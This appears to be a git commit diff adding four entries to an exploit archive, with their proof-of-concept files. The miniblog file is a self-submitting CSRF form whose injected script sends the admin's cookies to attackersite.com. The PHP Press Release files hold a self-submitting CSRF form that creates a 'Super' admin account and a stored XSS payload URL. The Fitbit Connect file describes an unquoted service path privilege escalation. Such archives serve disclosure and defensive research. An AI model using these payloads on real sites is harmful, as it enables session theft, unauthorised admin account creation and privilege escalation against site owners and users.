DB: 2016-10-10
4 new exploits miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post) Fitbit Connect Service - Unquoted Service Path Privilege Escalation PHP Press Release - Cross-Site Request Forgery (Add Admin) PHP Press Release - Stored Cross Site Scripting
This commit is contained in:
parent
cda049fa54
commit
8ea4614148
5 changed files with 128 additions and 0 deletions
|
@ -36597,3 +36597,7 @@ id,file,description,date,author,platform,type,port
|
|||
40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
|
||||
40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
|
||||
40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0
|
||||
40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0
|
||||
40482,platforms/windows/local/40482.txt,"Fitbit Connect Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
|
||||
40486,platforms/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps,0
|
||||
40487,platforms/php/webapps/40487.txt,"PHP Press Release - Stored Cross Site Scripting",2016-10-09,Besim,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
38
platforms/php/webapps/40480.txt
Executable file
38
platforms/php/webapps/40480.txt
Executable file
|
@ -0,0 +1,38 @@
|
|||
# Exploit Title : miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
|
||||
# Author : Besim
|
||||
# Google Dork :
|
||||
# Date : 09/10/2016
|
||||
# Type : webapps
|
||||
# Platform : PHP
|
||||
# Vendor Homepage : http://www.spyka.net/scripts/php/miniblog
|
||||
# Software link :
|
||||
http://dl.spyka.co.uk/scripts/php/miniblog-1-0-1.zip
|
||||
|
||||
|
||||
Description (admin login required) :
|
||||
|
||||
miniblog 1.0.1 versions is vulnerable to CSRF attack, adding, delete and
|
||||
edit article in the sections
|
||||
|
||||
Vulnerable page : http://localhost:8081/miniblog/*adm/admin.php?mode=add
|
||||
|
||||
Dangerous point : if used with XSS can be steal on the admin's cookie information.
|
||||
|
||||
|
||||
*############### CSRF PoC ###############*
|
||||
|
||||
|
||||
<html> <!-- CSRF PoC --> <body> <form action="
|
||||
http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20post%20in%20%3Cb%3EC:\xampp\htdocs\miniblog\adm\edit.php%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b%3E%3Cbr%20/%3E"
|
||||
method="POST"> <input type="hidden" name="data[post_title]"
|
||||
value="<script>location.href = ‘http://www.attackersite.com/stealer.php?cookie=’+document.cookie;</script>"
|
||||
/> <input type="hidden" name="data[post_content]"
|
||||
value="tester" /> <input type="hidden" name="data[published]"
|
||||
value="1" /> <input type="hidden" name="miniblog_PostBack" value="Add"
|
||||
/> <input type="submit" value="Submit request" /> </form> <script>
|
||||
document.forms[0].submit(); </script> </body> </html>
|
||||
|
||||
|
||||
|
||||
########################################
|
||||
|
35
platforms/php/webapps/40486.txt
Executable file
35
platforms/php/webapps/40486.txt
Executable file
|
@ -0,0 +1,35 @@
|
|||
# Exploit Title : PHP Press Release - Cross-Site Request Forgery (Add Admin - Super User )
|
||||
# Author : Besim
|
||||
# Google Dork : -
|
||||
# Date : 09/10/2016
|
||||
# Type : webapps
|
||||
# Platform : PHP
|
||||
# Vendor Homepage : http://www.pagereactions.com/product.php?pku=1
|
||||
Software link :
|
||||
http://www.pagereactions.com/downloads/phppressrelease.zip
|
||||
|
||||
|
||||
|
||||
########################### CSRF PoC ###############################
|
||||
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC -->
|
||||
<body>
|
||||
<form action="http://sitename/phppressrelease/administration.php" method="POST">
|
||||
<input type="hidden" name="pageaction" value="saveuser" />
|
||||
<input type="hidden" name="subaction" value="submit" />
|
||||
<input type="hidden" name="username" value="murat" />
|
||||
<input type="hidden" name="password" value="murat" />
|
||||
<input type="hidden" name="userfullname" value="murat tester" />
|
||||
<input type="hidden" name="accesslevel" value="Super" />
|
||||
<input type="hidden" name="userstatus" value="active" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
<script>
|
||||
*document.forms[0].submit();*
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
####################################################################
|
22
platforms/php/webapps/40487.txt
Executable file
22
platforms/php/webapps/40487.txt
Executable file
|
@ -0,0 +1,22 @@
|
|||
# Exploit Title : PHP Press Release* - Stored Cross Site
|
||||
Scripting*
|
||||
# Author : Besim
|
||||
# Google Dork : -
|
||||
# Date : 09/10/2016
|
||||
# Type : webapps
|
||||
# Platform : PHP
|
||||
# Vendor Homepage : http://www.pagereactions.com/product.php?pku=1
|
||||
# Software link :
|
||||
http://www.pagereactions.com/downloads/phppressrelease.zip
|
||||
|
||||
|
||||
Description :
|
||||
|
||||
Vulnerable link :
|
||||
http://site_name/phppressrelease/administration.php?pageaction=newrelease
|
||||
|
||||
Stored XSS Payload :
|
||||
|
||||
http://www.site_name/phppressrelease/administration.php?pageaction=saverelease&subaction=submit&dateday=&datemonthnewedit=&dateyearnewedit=&title=<script>alert('Exploit-DB')<%2Fscript>&summary=deneme&releasebody=deneme&categorynewedit=1&publish=active
|
||||
|
||||
|
29
platforms/windows/local/40482.txt
Executable file
29
platforms/windows/local/40482.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
Fitbit Connect Service: https://www.fitbit.com/
|
||||
By Ross Marks: http://www.rossmarks.co.uk
|
||||
Exploit-db: https://www.exploit-db.com/author/?a=8724
|
||||
Category: Local
|
||||
Tested on: Windows 10 x86/x64
|
||||
|
||||
1) Unquoted Service Path Privilege Escalation
|
||||
|
||||
Fitbit connect installs as a service with an unquoted service path running with SYSTEM privileges.
|
||||
This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.
|
||||
|
||||
A successful attempt would require the local attacker must insert an executable file in the path of the service.
|
||||
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
|
||||
|
||||
PoC:
|
||||
|
||||
C:\>sc qc "Fitbit Connect"
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: Fitbit Connect
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : Fitbit Connect Service
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : NT AUTHORITY\NetworkService
|
Loading…
Add table
Reference in a new issue